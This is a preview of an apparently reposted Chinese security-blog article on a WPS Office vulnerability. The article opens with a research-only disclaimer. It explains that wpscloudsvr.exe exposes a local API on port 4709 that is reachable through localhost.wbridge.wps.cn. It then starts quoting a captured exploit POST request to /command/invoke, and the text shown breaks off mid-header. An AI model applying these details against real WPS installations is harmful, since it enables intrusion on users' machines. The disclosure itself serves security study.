文章预览
声明: 文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 文章原文: https://gugesay.com/archives/3435 QQ交流群(6324875)已建立,可自行扫码加入↓ ↓ ↓ 背景介绍 上个月曾爆出XX黑客使用 WPS 0day攻击的消息,该漏洞主要涉及wpscloudsvr.exe(即WPS的云服务),当WPS运行时,会建立一个端口为4709的API接口,而该接口可以被滥用,近期该漏洞(实为1day,并非0day)利用细节被捕获并在GitHub上披露。 漏洞细节 WPS Office的wpscloudsvr.exe服务启动时会监听127.0.0.1:4709端口, 但直接访问是无法正常访问的,需要使用域名访问,如:http://localhost.wbridge.wps.cn:4709 捕获到的POST请求内容: POST /command/invoke HTTP/1.1 Host: localhost.wbridge.wps.cn:4709 Accept: text/html,application
………………………………